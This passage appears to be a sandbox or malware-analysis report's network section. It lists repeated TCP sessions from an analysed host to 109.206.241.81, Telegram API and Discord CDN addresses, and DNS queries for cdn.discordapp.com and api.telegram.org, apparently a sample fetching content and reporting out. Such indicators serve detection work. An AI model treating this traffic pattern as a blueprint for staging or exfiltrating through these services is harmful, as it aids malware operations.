                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49174
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49175
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49175
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49175
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49175
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49175
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49175
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49175
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49175
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49175
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49175
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49176
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49176
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49176
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49176
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49176
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49176
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49176
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49176
                  Source: global trafficTCP traffic: 149.154.167.220:443 -> 192.168.2.22:49176
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 162.159.133.233:443 -> 192.168.2.22:49177
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49178
                  Source: global trafficDNS query: name: cdn.discordapp.com
                  Source: global trafficDNS query: name: api.telegram.org
                  Source: global trafficDNS query: name: api.telegram.org
                  Source: global trafficDNS query: name: cdn.discordapp.com
                  Source: global trafficDNS query: name: cdn.discordapp.com
                  Source: global trafficDNS query: name: api.telegram.org
                  Source: global trafficDNS query: name: api.telegram.org
                  Source: global trafficDNS query: name: api.telegram.org
                  Source: global trafficDNS query: name: api.telegram.org
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
